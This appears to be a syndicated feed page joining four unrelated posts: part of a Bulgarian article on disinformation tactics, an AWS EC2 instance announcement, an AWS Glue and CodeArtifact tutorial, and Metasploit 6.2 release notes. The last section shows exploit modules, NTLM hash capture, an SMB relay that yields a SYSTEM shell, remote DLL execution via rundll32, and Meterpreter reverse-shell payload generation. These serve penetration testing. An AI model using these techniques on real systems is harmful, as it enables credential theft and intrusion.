Политическата поляризация захранва идеята, че съществува медиен, академичен или институционален заговор, който крие някаква истина от обикновения човек. Тези тенденции се поддържат от нарастващото недоверие в институциите, което не е напълно неоснователно поради редица хронични проблеми. Но манипулативната информация рядко предлага по-добри решения – тя по-скоро цели да експлоатира слабости, да настрои и разгневи, да уплаши. Парадоксално е, че голяма част от антиковидната или антиукраинската реторика е насочена съответно срещу организации като СЗО или ООН, но това не пречи те да бъдат цитирани избирателно, когато подкрепят определени тези. Така се получава, че медиите и институциите са „честни“ именно тогава, когато критикуват Запада или подкрепят Русия например, но не и когато критикуват руския президент. Подобни противоречия може да бъдат червен флаг за потребителя.

Избирателно цитиране, премълчаване на контекст и фалшиви автори

Макар че оспорват легитимността на големите медии, дезинформационните сайтове се стараят да приличат на професионална новинарска организация и често цитират реномирани медии, на които би трябвало да са „алтернатива“. Пример за това е сайтът durjavnik.bg, който също публикува проруско и антизападно съдържание, но и други съкратени препечатки. Сайтът разчита на истинска информация, която препубликува избирателно и без контекст – от изказвания на Кадиров и Путин до интервю с професорката от престижния Лондонски икономически университет Кристина Шпор, която се цитира така, че да се рамкира инвазията в Украйна като устояване на заплаха от Запада вместо като война за териториално и културно надмощие.

Статиите в durjavnik.bg се подписват от Георги Александров, но снимката, която стои до името му, се използва и в други сайтове под други имена. В същото време не откриваме данни за репортер с такова име, с изключение на починалия преди две години варненски журналист. Facebook страницата „Голата истина“, в чието описание е отбелязано „Държавник – водещият онлайн портал за новини“ и в която се споделят изключително и само статии на durjavnik.bg, е следвана от над 116 000 потребители (за разлика от официалната Facebook страница на сайта с под 7000 последователи). Основната разлика между durjavnik.bg и vsekidenbg.eu е, че първият препечатва реални новини без коментар, докато вторият залага повече на превратно и избирателно тълкуване. И двата сайта са популярни във Facebook групи, в които доскоро се разпространяваше антиваксърско съдържание, преливащо в момента в проруско.

В такава ситуация потребителят би могъл да разбере дали става дума за манипулативно съдържание, ако обърне внимание на два фактора: позиции и предоставяне на контекст. Ако статиите представят само едностранчива позиция и критикуват системно едни, а възхваляват други, вероятно става въпрос за малинформация или дезинформация. Професионалните журналисти отразяват не определени страни, а конкретни проблеми и събития.

Проруският сайт pogled.info например цитира избирателно реномирани чуждестранни медии, като „Гардиън“ и „Ню Йорк Таймс“, за да подкрепи материал, който отбелязва победата на Русия в „Азовстал“, без да споменава цялостния контекст на информацията. Pogled.info е пореден пример за „алтернативна“ медия, която цитира легитимни източници, когато е угодно. Същият метод беше използван от сайта при отразяването на пандемията. Подобни сайтове често цитират критични към Запада статии от реномирани медии, но хулят същите медии, когато те са критични към Кремъл или когато заявяват различна ценностна позиция.

Попитахме читателите на „Тоест“

Обърнахме се и към нашите читатели с въпроса какво според тях представлява манипулативното съдържание. Отговорите им обобщават обяснените вече признаци: подвеждащи и емоционални заглавия, липса на източници, дата и автор, както и използване на език, който цели да повлияе на читателя и да му внуши определени изводи, вместо да го остави сам да формира мнение на база на фактите.

„Невероятните твърдения изискват невероятни доказателства“, коментира една читателка. На друга ѝ правят впечатление внушения от заглавието дали един политик е лош, или не, на базата на негово изказване, без да е добавен контекст и история, или пък радикални заглавия за вдигане на цените например, които обаче не обясняват икономически и социални фактори, допринасящи за тези скокове.

Друг читател посочва тактиката да се транскрибират думи и понятия от определен език, и то по такъв начин, че да звучат чуждо и плашещо. „Ювенална юстиция“ е чудесен пример за нещо, за което си има български превод – „детско правосъдие“. Но пък така пренесено (по руски тертип), звучи непознато. И тук е лесно да се направи логическото заключение (в главата на читателя), че някой отвън се опитва да ни налага нещо несвойствено за нас, казва той.

Инфографики и заглавна илюстрация: © Ива Тошкова / „Тоест“
В настоящата поредица Йоанна Елми подробно изследва темата за манипулативното съдържание и отговаря на пет въпроса: какво представлява то и как, от кого, кога и защо се разпространява. Поредицата се осъществява с подкрепата на международната програма за научна журналистика Science+ на Free Press Unlimited и Free Press for Eastern Europe.

Източник

New – Amazon EC2 R6id Instances with NVMe Local Instance Storage of up to 7.6 TB

Post Syndicated from Veliswa Boya original https://aws.amazon.com/blogs/aws/new-amazon-ec2-r6id-instances/

In November 2021, we launched the memory-optimized Amazon EC2 R6i instances, our sixth-generation x86-based offering powered by 3rd Generation Intel Xeon Scalable processors (code named Ice Lake).

Today I am excited to announce a disk variant of the R6i instance: the Amazon EC2 R6id instances with non-volatile memory express (NVMe) SSD local instance storage. The R6id instances are designed to power applications that require low storage latency or require temporary swap space.

Customers with workloads that require access to high-speed, low-latency storage, including those that need temporary storage for scratch space, temporary files, and caches, have the option to choose the R6id instances with NVMe local instance storage of up to 7.6 TB. The new instances are also available as bare-metal instances to support workloads that benefit from direct access to physical resources.

Here’s some background on what led to the development of the sixth-generation instances. Our customers who are currently using fifth-generation instances are looking for the following:

  • Higher Compute Performance – Higher CPU performance to improve latency and processing time for their workloads
  • Improved Price Performance – Customers are very sensitive to price performance to optimize costs
  • Larger Sizes – Customers require larger sizes to scale their enterprise databases
  • Higher Amazon EBS Performance – Customers have requested higher Amazon EBS throughput (“at least double”) to improve response times for their analytics applications
  • Local Storage – Large customers have expressed a need for more local storage per vCPU

Sixth-generation instances address these requirements by offering generational improvement across the board, including 15 percent increase in price performance, 33 percent more vCPUs, up to 1 TB memory, 2x networking performance, 2x EBS performance, and global availability.

Compared to R5d instances, the R6id instances offer:

  • Larger instance size (.32xlarge) with 128 vCPUs and 1024 GiB of memory, enabling customers to consolidate their workloads and scale up applications.
  • Up to 15 percent improvement in compute price performance and 20 percent higher memory bandwidth.
  • Up to 58 percent higher storage per vCPU and 34 percent lower cost per TB.
  • Up to 50 Gbps network bandwidth and up to 40 Gbps EBS bandwidth; EBS burst bandwidth support for sizes up to .4xlarge.
  • Always-on memory encryption.
  • Support for new Intel Advanced Vector Extensions (AVX 512) instructions such as VAES, VCLMUL, VPCLMULQDQ, and GFNI for faster execution of cryptographic algorithms such as those used in IPSec and TLS implementations.

The detailed specifications of the R6id instances are as follows:

Instance Name

vCPUs RAM (GiB)

Local NVMe SSD Storage (GB)

EBS Throughput (Gbps)

Network Bandwidth (Gbps)

r6id.large 2 16 1 x 118 Up to 10 Up to 12.5
r6id.xlarge 4 32 1 x 237 Up to 10 Up to 12.5
r6id.2xlarge 8 64 1 x 474 Up to 10 Up to 12.5
r6id.4xlarge 16 128 1 x 950 Up to 10 Up to 12.5
r6id.8xlarge 32 256 1 x 1900 10 12.5
r6id.12xlarge 48 384 2 x 1425 15 18.75
r6id.16xlarge 64 512 2 x 1900 20 25
r6id.24xlarge 96 768 4 x 1425 30 37.5
r6id.32xlarge 128 1024 4 x 1900 40 50
r6id.metal 128 1024 4 x 1900 40 50

Now available

The R6id instances are available today in the AWS US East (Ohio), US East (N.Virginia), US West (Oregon), and Europe (Ireland) Regions as On-Demand, Spot, and Reserved Instances or as part of a Savings Plan. As usual, with EC2, you pay for what you use. For more information, see the Amazon EC2 pricing page.

To learn more, visit our Amazon EC2 R6i instances page, and please send feedback to AWS re:Post for EC2 or through your usual AWS Support contacts.

Veliswa x

Simplify and optimize Python package management for AWS Glue PySpark jobs with AWS CodeArtifact

Post Syndicated from Ashok Padmanabhan original https://aws.amazon.com/blogs/big-data/simplify-and-optimize-python-package-management-for-aws-glue-pyspark-jobs-with-aws-codeartifact/

Data engineers use various Python packages to meet their data processing requirements while building data pipelines with AWS Glue PySpark Jobs. Languages like Python and Scala are commonly used in data pipeline development. Developers can take advantage of their open-source packages or even customize their own to make it easier and faster to perform use cases, such as data manipulation and analysis. However, managing standardized packages can be cumbersome with multiple teams using different versions of packages, installing non-approved packages, and causing duplicate development effort due to the lack of visibility of what is available at the enterprise level. This can be especially challenging in large enterprises with multiple data engineering teams.

ETL Developers have requirements to use additional packages for their AWS Glue ETL jobs. With security being job zero for customers, many will restrict egress traffic from their VPC to the public internet, and they need a way to manage the packages used by applications including their data processing pipelines.

Our proposed solution will enable you with network egress restrictions to manage packages centrally with AWS CodeArtifact and use their favorite libraries in their AWS Glue ETL PySpark code. In this post, we’ll describe how CodeArtifact can be used for managing packages and modules for AWS Glue ETL jobs, and we’ll demo a solution using Glue PySpark jobs that run within VPC Subnets that have no internet access.

Solution overview

The solution uses CodeArtifact as a tool to make it easier for organizations of any size to securely store, publish, and share software packages used in their ETL with AWS Glue. VPC Endpoints will be enabled for CodeArtifact and Glue to enable private link connections. AWS Step Functions makes it easy to coordinate the orchestration of components used in the data processing pipeline. Native integrations with both CodeArtifact and AWS Glue enable the workflow to both authenticate the request to CodeArtifact and start the AWS Glue ETL job.

The following architecture shows an implementation of a solution using AWS Glue, CodeArtifact, and Step Functions to use additional Python modules without egress internet access. The solution is deployed using AWS Cloud Development Kit (AWS CDK), an open-source software development framework to define your cloud application resources using familiar programming languages.

Solution Architecture for the blog post

Fig 1: Architecture Diagram for the Solution

To illustrate how to set up this architecture, we’ll walk you through the following steps:

  1. Deploying an AWS CDK stack to provision the following AWS Resources
    1. CodeArtifact
    2. An AWS Glue job
    3. Step Functions workflow
    4. Amazon Simple Storage Service (Amazon S3) bucket
    5. A VPC with a private Subnet and VPC Endpoints to Amazon S3 and CodeArtifact
  2. Validate the Deployment.
  3. Run a Sample Workflow – This workflow will run an AWS Glue PySpark job that uses a custom Python library, and an upgraded version of boto3.
  4. Cleaning up your resources.

Prerequisites

Make sure that you complete the following steps as prerequisites:

The solution

Launching your AWS CDK Stack

Step 1: Using your device’s command line, check out our Git repository to a local directory on your device:

git clone https://github.com/aws-samples/python-lib-management-without-internet-for-aws-glue-in-private-subnets.git

Step 2: Change directories to the new directory Amazon S3 script location:

cd python-lib-management-without-internet-for-aws-glue-in-private-subnets/scripts/s3

Step 3: Download the following CSV, which contains New York City Taxi and Limousine Commission (TLC) Trip weekly trips. This will serve as the input source for the AWS Glue Job:

aws s3 cp s3://nyc-tlc/misc/FOIL_weekly_trips_apps.csv .

Step 4: Change the directories to the path where the app.py file is located (in reference to the previous step, execute the following step):

cd ../..

Step 5: Create a virtual environment:

macOS/Linux:
python3 -m venv .env

Windows:
python -m venv .env

Step 6: Activate the virtual environment after the init process completes and the virtual environment is created:

macOS/Linux:
source .env/bin/activate

Windows:
.env\Scripts\activate.bat

Step 7: Install the required dependencies:

pip3 install -r requirements.txt

Step 8: Make sure that your AWS profile is setup along with the region that you want to deploy as mentioned in the prerequisite. Synthesize the templates. AWS CDK apps use code to define the infrastructure, and when run they produce or “synthesize” a CloudFormation template for each stack defined in the application:

cdk synthesize

Step 9: BootStrap the cdk app using the following command:

cdk bootstrap aws://<AWS_ACCOUNTID>/<AWS_REGION>

Replace the place holder AWS_ACCOUNTID and AWS_REGION with your AWS account ID and the region to be deployed.

This step provisions the initial resources, including an Amazon S3 bucket for storing files and IAM roles that grant permissions needed to perform deployments.

Step 10: Deploy the solution. By default, some actions that could potentially make security changes require approval. In this deployment, you’re creating an IAM role. The following command overrides the approval prompts, but if you would like to manually accept the prompts, then omit the --require-approval never flag:

cdk deploy "*" --require-approval never

While the AWS CDK deploys the CloudFormation stacks, you can follow the deployment progress in your terminal:

AWS CDK Deployment progress in terminal

Fig 2: AWS CDK Deployment progress in terminal

Once the deployment is successful, you’ll see the successful status as follows:

AWS CDK Deployment completion success

Fig 3: AWS CDK Deployment completion success

Step 11: Log in to the AWS Console, go to CloudFormation, and see the output of the ApplicationStack stack:

AWS CloudFormation stack output

Fig 4: AWS CloudFormation stack output

Note the values of the DomainName and RepositoryName variables. We’ll use them in the next step to upload our artifacts

Step 12: We will upload a custom library into the repo that we created. This will be used by our Glue ETL job.

  • Install twine using pip:
python3 -m pip install twine

The custom python package glueutils-0.2.0.tar.gz can be found under this folder of the cloned repo:

cd scripts/custom_glue_library
  • Configure twine with the login command (additional details here ). Refer to step 11 for the DomainName and RepositoryName from the CloudFormation output:
aws codeartifact login --tool twine --domain <DomainName> --domain-owner <AWS_ACCOUNTID> --repository <RepositoryName>
  • Publish Python package assets:
twine upload --repository codeartifact glueutils-0.2.0.tar.gz
Python package publishing using twine

Fig 5: Python package publishing using twine

Validate the Deployment

The AWS CDK stack will deploy the following AWS resources:

  1. Amazon Virtual Private Cloud (Amazon VPC)
    1. One Private Subnet
  2. AWS CodeArtifact
    1. CodeArtifact Repository
    2. CodeArtifact Domain
    3. CodeArtifact Upstream Repository
  3. AWS Glue
    1. AWS Glue Job
    2. AWS Glue Database
    3. AWS Glue Connection
  4. AWS Step Function
  5. Amazon S3 Bucket for AWS CDK and also for storing scripts and CSV file
  6. IAM Roles and Policies
  7. Amazon Elastic Compute Cloud (Amazon EC2) Security Group

Step 1: Browse to the AWS account and region via the AWS Console to which the resources are deployed.

Step 2: Browse the Subnet page (https://<region> .console.aws.amazon.com/vpc/home?region=<region> #subnets:) (*Replace region with actual AWS Region to which your resources are deployed)

Step 3: Select the Subnet with name as ApplicationStack/enterprise-repo-vpc/Enterprise-Repo-Private-Subnet1

Step 4: Select the Route Table and validate that there are no Internet Gateway or NAT Gateway for routes to Internet, and that it’s similar to the following image:

Route table validation

Fig 6: Route table validation

Step 5: Navigate to the CodeArtifact console and review the repositories created. The enterprise-repo is your local repository, and pypi-store is the upstream repository connected to the PyPI, providing artifacts from pypi.org.

AWS CodeArifact repositories created

Fig 7: AWS CodeArifact repositories created

Step 6: Navigate to enterprise-repo and search for glueutils. This is the custom python package that we published.

AWS CodeArifact custom python package published

Fig 8: AWS CodeArifact custom python package published

Step 7: Navigate to Step Functions Console and review the enterprise-repo-step-function as follows:

AWS Step Functions workflow

Fig 9: AWS Step Functions workflow

The diagram shows how the Step Functions workflow will orchestrate the pattern.

  1. The first step CodeArtifactGetAuthorizationToken calls the getAuthorizationToken API to generate a temporary authorization token for accessing repositories in the domain (this token is valid for 15 mins.).
  2. The next step GenerateCodeArtifactURL takes the authorization token from the response and generates the CodeArtifact URL.
  3. Then, this will move into the GlueStartJobRun state, which makes a synchronous API call to run the AWS Glue job.

Step 8: Navigate to the AWS Glue Console and select the Jobs tab, then select enterprise-repo-glue-job.

The AWS Glue job is created with the following script and AWS Glue Connection enterprise-repo-glue-connection. The AWS Glue connection is a Data Catalog object that enables the job to connect to sources and APIs from within the VPC. The network type connection runs the job from within the private subnet to make requests to Amazon S3 and CodeArtifact over the VPC endpoint connection. This enables the job to run without any traffic through the internet.

Note the connections section in the AWS Glue PySpark Job, which makes the Glue job run on the private subnet in the VPC provisioned.

AWS Glue network connections

Fig 10: AWS Glue network connections

The job takes an Amazon S3 bucket, Glue Database, Python Job Installer Option, and Additional Python Modules as job parameters. The parameters --additional-python-modules and --python-modules-installer-option are passed to install the selected Python module from a PyPI repository hosted in AWS CodeArtifact.

The script itself first reads the Amazon S3 input path of the taxi data in the CSV format. A light transformation to sum the total trips by year, week, and app is performed. Then the output is written to an Amazon S3 path as parquet . A partitioned table in the AWS Glue Data Catalog will either be created or updated if it already exists .

You can find the Glue PySpark script here.

Run a sample workflow

The following steps will demonstrate how to run a sample workflow:

Step 1: Navigate to the Step Functions Console and select the enterprise-repo-step-function.

Step 2: Select Start execution and input the following: We’re including the glueutils and latest boto3 libraries as part of the job run. It is always recommended to pin your python dependencies to avoid any breaking change due to a future version of dependency . In the below example, the latest available version of boto3, and the 0.2.0 version of glueutils will be installed. To pin it to a specific release you may add  boto3==1.24.2   (Current latest release at the time of publishing this post).

{"pythonmodules": "boto3,glueutils==0.2.0"}

Step 3: Select Start execution and wait until Execution Status is Succeeded. This may take a few minutes.

Step 4: Navigate to the CodeArtifact Console to review the enterprise-repo repository. You’ll see the cached PyPi packages and all of their dependencies pulled down from PyPi.

Step 5: In the Glue Console under the Runs section of the enterprise-glue-job, you’ll see the parameters passed:

Fig 11 : AWS Glue job execution history

Fig 11 : AWS Glue job execution history

Note the --index-url which was passed as a parameter to the glue ETL job. The token is valid only for 15 minutes.

Step 6: Navigate to the Amazon CloudWatch Console and go to the /aws/glue-jobs log group to verify that the packages were installed from the local repo.

You will see that the 2 package names passed as parameters are installed with the corresponding versions.

Fig 12 : Amazon CloudWatch logs details for the Glue job

Fig 12 : Amazon CloudWatch logs details for the Glue job

Step 7: Navigate to the Amazon Athena console and select Query Editor.

Step 8: Run the following query to validate the output of the AWS Glue job:

SELECT year, app, SUM(total_trips) as sum_of_total_trips 
FROM 
"codeartifactblog_glue_db"."taxidataparquet" 
GROUP BY year, app;

Clean up

Make sure that you clean up all of the other AWS resources that you created in the AWS CDK Stack deployment. You can delete these resources via the AWS CDK Destroy command as follows or the CloudFormation console.

To destroy the resources using AWS CDK, follow these steps:

  1. Follow Steps 1-6 from the ‘Launching your CDK Stack’ section.
  2. Destroy the app by executing the following command:
    cdk destroy

Conclusion

In this post, we demonstrated how CodeArtifact can be used for managing Python packages and modules for AWS Glue jobs that run within VPC Subnets that have no internet access. We also demonstrated how the versions of existing packages can be updated (i.e., boto3) and a custom Python library (glueutils) that is developed locally is also managed through CodeArtifact.

This post enables you to use your favorite Python packages with AWS Glue ETL PySpark jobs by modifying the input to the AWS StepFunctions workflow (Step 2 in the Run a Sample workflow section).


About the Authors

Bret Pontillo is a Data & ML Engineer with AWS Professional Services. He works closely with enterprise customers building data lakes and analytical applications on the AWS platform. In his free time, Bret enjoys traveling, watching sports, and trying new restaurants.

Gaurav Gundal is a DevOps consultant with AWS Professional Services, helping customers build solutions on the customer platform. When not building, designing, or developing solutions, Gaurav spends time with his family, plays guitar, and enjoys traveling to different places.

Ashok Padmanabhan is a Sr. IOT Data Architect with AWS Professional Services, helping customers build data and analytics platform and solutions. When not helping customers build and design data lakes, Ashok enjoys spending time at the beach near his home in Florida.

Announcing Metasploit 6.2

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/

Announcing Metasploit 6.2

Metasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we’ve added:

  • 138 new modules
  • 148 enhancements and features
  • 156 bug fixes

Top modules

Each week, the Metasploit team publishes a Metasploit wrap-up with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).

Remote Exploitation

  • VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits CVE-2021-44228: A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as root / SYSTEM. This exploit has been tested on both Windows and Linux targets.
  • F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388: This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the root user on affected systems.
  • VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954: This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.
  • Zyxel Firewall ZTP Unauthenticated Command Injection by jbaines-r7, which exploits CVE-2022-30525: This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the nobody user. The vulnerability was discovered by Rapid7 researcher Jake Baines.

Local Privilege Escalation

Capture plugin

Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the auxiliary/server/capture namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, a new capture plugin can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.

After running the load capture command, the captureg command is available (for Capture-Global), which then offers start and stop subcommands. A configuration file can be used to select individual services to start.

In the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:

msf6 > load capture
[*] Successfully loaded plugin: Credential Capture
msf6 > captureg start --ip 192.168.123.128
Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt
Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339
[+] Authentication Capture: DRDA (DB2, Informix, Derby) started
[+] Authentication Capture: FTP started
[+] HTTP Client MS Credential Catcher started
[+] HTTP Client MS Credential Catcher started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: MSSQL started
[+] Authentication Capture: MySQL started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: PostgreSQL started
[+] Printjob Capture Service started
[+] Authentication Capture: SIP started
[+] Authentication Capture: SMB started
[+] Authentication Capture: SMTP started
[+] Authentication Capture: Telnet started
[+] Authentication Capture: VNC started
[+] Authentication Capture: FTP started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: SMTP started
[+] NetBIOS Name Service Spoofer started
[+] LLMNR Spoofer started
[+] mDNS Spoofer started
[+] Started capture jobs

Opening a new terminal in conjunction with the tail command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:

$ tail -f  ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt

[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.123.136
[SMB] NTLMv2-SSP Username   : EXAMPLE\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:0101000000000000009391080b6bd8013406d39c880c5a66000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800009391080b6bd801060004000200000008003000300000000000000001000000002000009eee3e2f941900a084d7941d60cbd5e04f91fbf40f59bfa4ed800b060921a6740a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320033002e003100320038000000000000000000

It is also possible to log directly to stdout without using the tail command:

captureg start --ip 192.168.123.128 --stdout

SMB v3 server support

This work builds upon the SMB v3 client support added in Metasploit 6.0.

Metasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.

Example usage:

ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point

This can be useful for copying files onto remote targets, or for running remote DLLs:

copy \\192.168.123.1\home\example.txt .
rundll32.exe \\192.168.123.1\home\example.dll,0

All remaining Metasploit modules have now been updated to support SMB v3. Some examples:

  • exploit/windows/smb/smb_delivery: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as rundll32.exe \\192.168.123.128\tHKPx\WeHnu,0
  • exploit/windows/smb/capture: This module creates a mock SMB server that accepts credentials before returning NT_STATUS_LOGON_FAILURE. Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking
  • exploit/windows/dcerpc/cve_2021_1675_printnightmare: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.
  • exploit/windows/smb/smb_relay: Covered in more detail below.

Enhanced SMB relay support

The windows/smb/smb_relay has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.

Example module usage:

use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run

Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:

msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client     : 192.168.123.4
[SMB] NTLMv2-SSP Username   : \admin
[SMB] NTLMv2-SSP Hash       : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000

[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000

A session will be opened on the relay target with the associated credentials:

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771  (192.168.123.4)

Further details can be found in the Metasploit SMB Relay documentation.

Improved pivoting / NATed services support

Metasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that’s provided by the reverse_tcp and reverse_http(s) payload stagers.

When a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won’t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on — in this case, the IP address that the router will forward the incoming connection to.

For example, with the network configuration:

Private IP: 172.31.21.26 (where Metasploit can bind to)
External IP: 10.2.3.4 (where the target connects to Metasploit)

The Metasploit module commands would be:

# Set where the target connects to Metasploit. ListenerBindAddress is a new option.
set srvhost 10.2.3.4
set ListenerBindAddress 172.31.21.26

# Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.
set lhost 10.2.3.4
set ReverseListenerBindAddress 172.31.21.26

Debugging Meterpreter sessions

There are now two ways to debug Meterpreter sessions:

  1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets
  2. Generate a custom Meterpreter debug build with extra logging present

Log Meterpreter TLV packets

This can be enabled for any Meterpreter session and does not require a special debug Metasploit build:

msf6 > setg SessionTlvLogging true
SessionTlvLogging => true

Here’s an example of logging the network traffic when running the getenv Meterpreter command:

meterpreter > getenv USER

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1052 command=stdapi_sys_config_getenv>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="73717259684850511890564936718272">
  #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE    meta=STRING     value="USER">
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Response        tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="Q\xE63_onC\x9E\xD71\xDE3\xB5Q\xE24">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1052 command=stdapi_sys_config_getenv>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="73717259684850511890564936718272">
  #<Rex::Post::Meterpreter::Tlv type=RESULT          meta=INT        value=0>
  #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP       tlvs=[
    #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE    meta=STRING     value="USER">
    #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE       meta=STRING     value="demo_user">
  ]>
]>

Environment Variables
=====================

Variable  Value
--------  -----
USER      demo_user

Meterpreter debug builds

We have added additional options to Meterpreter payload generation for generating debug builds that will have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports etc. To choose a prebuilt Meterpreter payload with debug functionality present, set MeterpreterDebugBuild to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting MeterpreterDebugLogging to rpath:/tmp/meterpreter_log.txt.

For example, within msfconsole you can generate a new payload and create a handler:

use payload/python/meterpreter_reverse_tcp
generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false
to_handler

Running the payload will show the Meterpreter log output:

$ python3 shell.py
DEBUG:root:[*] running method core_negotiate_tlv_encryption
DEBUG:root:[*] Negotiating TLV encryption
DEBUG:root:[*] RSA key: 30820122300d06092a864886f70d01010105000382010f003082010a0282010100aa0f09225ff311d136b7c2ed02e5f4c819a924bd59a2ba67ea3e36c837c1d28ba97db085acad9374a543ad0709006d835c80aa273138948ec9ff699142405819e68b8dbc3c04300dc2a93a5be4be2263b69e8282447b6250abad8056de6e7f83b20c6151d72af63c908fa5b0c3ab3a4ac92d8b335a284b0542e3bf9ef10456024df2581b22f233a84e69d41d721aa00e23ba659c4420123d5fdd78ac061ffcb74e5ba60fece415c2be982df57d13afc107b8522dc462d08247e03d63b0d6aa639784e7187384c315147a7d18296f09495ba7969da01b1fb49097295792572a01acdaf7406f2ad5b25d767d8695cc6e33d33dfeeb158a6f50d43d07dd05aa19ff0203010001
DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966
